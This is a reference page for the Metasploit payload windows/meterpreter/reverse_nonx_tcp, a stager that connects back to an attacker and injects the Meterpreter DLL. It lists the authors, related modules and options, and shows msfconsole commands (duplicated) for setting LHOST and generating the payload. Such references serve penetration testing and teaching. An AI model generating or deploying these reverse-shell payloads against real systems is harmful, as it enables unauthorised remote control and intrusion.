Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
Rank
- Normal
Authors
- skape < mmiller [at] hick.org >
- sf < stephen_fewer [at] harmonysecurity.com >
- vlad902 < vlad902 [at] gmail.com >
Vulnerability References
Similar Modules
- payload/windows/meterpreter/bind_ipv6_tcp
- payload/windows/meterpreter/bind_nonx_tcp
- payload/windows/meterpreter/bind_tcp
- payload/windows/meterpreter/find_tag
- payload/windows/meterpreter/reverse_http
- payload/windows/meterpreter/reverse_https
- payload/windows/meterpreter/reverse_ipv6_http
- payload/windows/meterpreter/reverse_ipv6_https
- payload/windows/meterpreter/reverse_ipv6_tcp
- payload/windows/meterpreter/reverse_ord_tcp
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/meterpreter/reverse_nonx_tcp
msf payload(reverse_nonx_tcp) > set LHOST [MY IP ADDRESS]
msf payload(reverse_nonx_tcp) > generate
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/meterpreter/reverse_nonx_tcp
msf payload(reverse_nonx_tcp) > set LHOST [MY IP ADDRESS]
msf payload(reverse_nonx_tcp) > generate
Module Options
| EXITFUNC | Exit technique: thread, seh, none, process (default: process) |
| LHOST | The listen address |
| LPORT | The listen port (default: 4444) |
| AutoLoadStdapi | Automatically load the Stdapi extension |
| AutoRunScript | A script to run automatically on session creation. |
| AutoSystemInfo | Automatically capture system information on initialization. |
| EnableUnicodeEncoding | Automatically encode UTF-8 strings as hexadecimal |
| InitialAutoRunScript | An initial script to run on session creation (before AutoRunScript) |
| ReverseConnectRetries | The number of connection attempts to try before exiting the process |
| ReverseListenerBindAddress | The specific IP address to bind to on the local system |
| ReverseListenerComm | The specific communication channel to use for this listener |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
